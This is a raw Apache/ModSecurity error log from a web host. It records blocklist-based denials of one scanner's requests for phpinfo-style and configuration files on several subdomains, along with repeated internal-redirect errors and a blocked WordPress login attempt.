[Tue May 26 17:31:36.006253 2026] [security2:error] [pid 894579:tid 894729] [client 91.92.42.86:28798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLoAEtZWuWWBGzl__MnAAAAR0"], referer: http://anujtradingco.com/
[Tue May 26 17:31:36.007870 2026] [security2:error] [pid 894579:tid 894743] [client 91.92.42.86:28824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/php_info.php"] [unique_id "ahWLoAEtZWuWWBGzl__MngAAASs"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.014261 2026] [core:error] [pid 894579:tid 894757] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.014281 2026] [core:error] [pid 894579:tid 894757] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.015349 2026] [core:error] [pid 894579:tid 894808] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.015368 2026] [core:error] [pid 894579:tid 894808] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.016550 2026] [security2:error] [pid 891273:tid 891457] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kfQAAADY"], referer: http://anujtradingco.com/
[Tue May 26 17:31:36.019366 2026] [core:error] [pid 894579:tid 894785] [client 91.92.42.86:28866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.019389 2026] [core:error] [pid 894579:tid 894785] [client 91.92.42.86:28866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.022532 2026] [security2:error] [pid 894579:tid 894799] [client 91.92.42.86:28894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLoAEtZWuWWBGzl__MqQAAAWI"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.023230 2026] [core:error] [pid 894579:tid 894774] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.023244 2026] [core:error] [pid 894579:tid 894774] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.024633 2026] [security2:error] [pid 894579:tid 894836] [client 91.92.42.86:28906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/pinfo.php"] [unique_id "ahWLoAEtZWuWWBGzl__MqgAAAYc"], referer: http://anujtradingco.com/
[Tue May 26 17:31:36.025886 2026] [core:error] [pid 894579:tid 894811] [client 91.92.42.86:28856] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.025901 2026] [core:error] [pid 894579:tid 894811] [client 91.92.42.86:28856] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.030692 2026] [core:error] [pid 894579:tid 894727] [client 91.92.42.86:28884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.030707 2026] [core:error] [pid 894579:tid 894727] [client 91.92.42.86:28884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.034213 2026] [core:error] [pid 894579:tid 894727] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.034235 2026] [core:error] [pid 894579:tid 894727] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.046941 2026] [security2:error] [pid 894579:tid 894822] [client 91.92.42.86:28908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/php_info.php"] [unique_id "ahWLoAEtZWuWWBGzl__MsQAAAXk"], referer: http://anujtradingco.com/
[Tue May 26 17:31:36.047167 2026] [security2:error] [pid 891273:tid 891484] [client 91.92.42.86:28730] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLn8DEzZ8z3jtDm82kgAAAAFE"], referer: http://anujtradingco.com/
[Tue May 26 17:31:36.053314 2026] [security2:error] [pid 894579:tid 894721] [client 91.92.42.86:28940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLoAEtZWuWWBGzl__MtAAAARU"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.062723 2026] [core:error] [pid 891273:tid 891486] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.062737 2026] [core:error] [pid 891273:tid 891486] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.063827 2026] [core:error] [pid 891273:tid 891465] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.063839 2026] [core:error] [pid 891273:tid 891465] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.068267 2026] [security2:error] [pid 894579:tid 894766] [client 91.92.42.86:28950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLoAEtZWuWWBGzl__MuAAAAUI"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.075653 2026] [security2:error] [pid 891273:tid 891429] [client 91.92.42.86:28966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/test.php"] [unique_id "ahWLoMDEzZ8z3jtDm82kiQAAABo"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.078218 2026] [core:error] [pid 891273:tid 891517] [client 91.92.42.86:28982] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.078231 2026] [core:error] [pid 891273:tid 891517] [client 91.92.42.86:28982] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.080957 2026] [security2:error] [pid 891273:tid 891409] [client 91.92.42.86:28996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/server_info.php"] [unique_id "ahWLoMDEzZ8z3jtDm82kigAAAAY"], referer: http://test.anujtradingco.com/
[Tue May 26 17:31:36.081831 2026] [security2:error] [pid 894579:tid 894794] [client 91.92.42.86:29002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/pinfo.php"] [unique_id "ahWLoAEtZWuWWBGzl__MugAAAV0"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.084182 2026] [core:error] [pid 894579:tid 894828] [client 91.92.42.86:28994] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.084201 2026] [core:error] [pid 894579:tid 894828] [client 91.92.42.86:28994] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.094951 2026] [core:error] [pid 891273:tid 891506] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.094977 2026] [core:error] [pid 891273:tid 891506] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.105950 2026] [security2:error] [pid 891273:tid 891498] [client 91.92.42.86:29012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/configuration.php"] [unique_id "ahWLoMDEzZ8z3jtDm82kjgAAAF8"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.110879 2026] [security2:error] [pid 891273:tid 891487] [client 91.92.42.86:29036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/test.php"] [unique_id "ahWLoMDEzZ8z3jtDm82kkQAAAFQ"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:31:36.112880 2026] [core:error] [pid 894579:tid 894719] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.112899 2026] [core:error] [pid 894579:tid 894719] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.114187 2026] [core:error] [pid 891273:tid 891472] [client 91.92.42.86:29010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.114203 2026] [core:error] [pid 891273:tid 891472] [client 91.92.42.86:29010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.121366 2026] [security2:error] [pid 894579:tid 894732] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLoAEtZWuWWBGzl__MtQAAASA"], referer: http://anujtradingco.com/
[Tue May 26 17:31:36.123632 2026] [security2:error] [pid 894579:tid 894809] [client 91.92.42.86:29080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/server_info.php"] [unique_id "ahWLoAEtZWuWWBGzl__MvgAAAWw"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.128066 2026] [security2:error] [pid 894579:tid 894783] [client 91.92.42.86:29052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/test.php"] [unique_id "ahWLoAEtZWuWWBGzl__MvwAAAVI"], referer: http://test.anujtradingco.com/
[Tue May 26 17:31:36.132992 2026] [security2:error] [pid 891273:tid 891463] [client 91.92.42.86:29102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/server_info.php"] [unique_id "ahWLoMDEzZ8z3jtDm82klQAAADw"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.137700 2026] [security2:error] [pid 891273:tid 891485] [client 91.92.42.86:29086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/functions.php"] [unique_id "ahWLoMDEzZ8z3jtDm82klgAAAFI"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.145764 2026] [core:error] [pid 891273:tid 891492] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.145793 2026] [core:error] [pid 891273:tid 891492] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.155973 2026] [security2:error] [pid 891273:tid 891502] [client 91.92.42.86:29152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/test.php"] [unique_id "ahWLoMDEzZ8z3jtDm82knAAAAGM"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.160725 2026] [security2:error] [pid 894579:tid 894741] [client 91.92.42.86:29144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/pinfo.php"] [unique_id "ahWLoAEtZWuWWBGzl__MwgAAASk"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.168236 2026] [security2:error] [pid 894579:tid 894771] [client 91.92.42.86:28594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLoAEtZWuWWBGzl__MuwAAAUY"], referer: http://anujtradingco.com/
[Tue May 26 17:31:36.183783 2026] [core:error] [pid 891273:tid 891494] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.183799 2026] [core:error] [pid 891273:tid 891494] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.190295 2026] [security2:error] [pid 891273:tid 891516] [client 91.92.42.86:29190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/configuration.php"] [unique_id "ahWLoMDEzZ8z3jtDm82kowAAAHE"], referer: http://test.anujtradingco.com/
[Tue May 26 17:31:36.192142 2026] [core:error] [pid 891273:tid 891482] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.192158 2026] [core:error] [pid 891273:tid 891482] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:31:36.197874 2026] [core:error] [pid 894579:tid 894744] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.197909 2026] [core:error] [pid 894579:tid 894744] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.200279 2026] [core:error] [pid 894579:tid 894823] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.200295 2026] [core:error] [pid 894579:tid 894823] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.204862 2026] [security2:error] [pid 894579:tid 894761] [client 91.92.42.86:29222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/phpinfo/info.php"] [unique_id "ahWLoAEtZWuWWBGzl__MyAAAAT0"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.209475 2026] [security2:error] [pid 891273:tid 891518] [client 91.92.42.86:29216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/functions.php"] [unique_id "ahWLoMDEzZ8z3jtDm82kpQAAAHM"], referer: http://test.anujtradingco.com/
[Tue May 26 17:31:36.224335 2026] [security2:error] [pid 894579:tid 894777] [client 91.92.42.86:29244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/configuration.php"] [unique_id "ahWLoAEtZWuWWBGzl__MyQAAAUw"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.250519 2026] [security2:error] [pid 894579:tid 894796] [client 91.92.42.86:29268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/portal/phpinfo.php"] [unique_id "ahWLoAEtZWuWWBGzl__MzgAAAV8"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.279649 2026] [security2:error] [pid 894579:tid 894797] [client 91.92.42.86:29290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/portal/phpinfo.php"] [unique_id "ahWLoAEtZWuWWBGzl__M0QAAAWA"], referer: http://test.anujtradingco.com/
[Tue May 26 17:31:36.280506 2026] [security2:error] [pid 891273:tid 891448] [client 91.92.42.86:29082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/php_info.php"] [unique_id "ahWLoMDEzZ8z3jtDm82kqgAAAC0"], referer: http://test.anujtradingco.com/
[Tue May 26 17:31:36.288956 2026] [security2:error] [pid 891273:tid 891434] [client 91.92.42.86:29298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/pinfo.php"] [unique_id "ahWLoMDEzZ8z3jtDm82kqwAAAB8"], referer: http://test.anujtradingco.com/
[Tue May 26 17:31:36.297072 2026] [core:error] [pid 894579:tid 894755] [client 91.92.42.86:29300] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.297083 2026] [core:error] [pid 894579:tid 894755] [client 91.92.42.86:29300] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:31:36.299939 2026] [security2:error] [pid 894579:tid 894758] [client 91.92.42.86:29308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/phpinfo/info.php"] [unique_id "ahWLoAEtZWuWWBGzl__M1wAAATo"], referer: http://test.anujtradingco.com/
[Tue May 26 17:31:36.448230 2026] [security2:error] [pid 894579:tid 894818] [client 91.92.42.86:29398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/php_info.php"] [unique_id "ahWLoAEtZWuWWBGzl__M2gAAAXU"], referer: http://new.anujtradingco.com/
[Tue May 26 17:31:37.451817 2026] [security2:error] [pid 894579:tid 894727] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLoQEtZWuWWBGzl__M4AAAARs"]
[Tue May 26 17:31:37.817907 2026] [security2:error] [pid 894579:tid 894702] [remote 216.185.214.209:41260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWLoQEtZWuWWBGzl__M5AABbXo"]
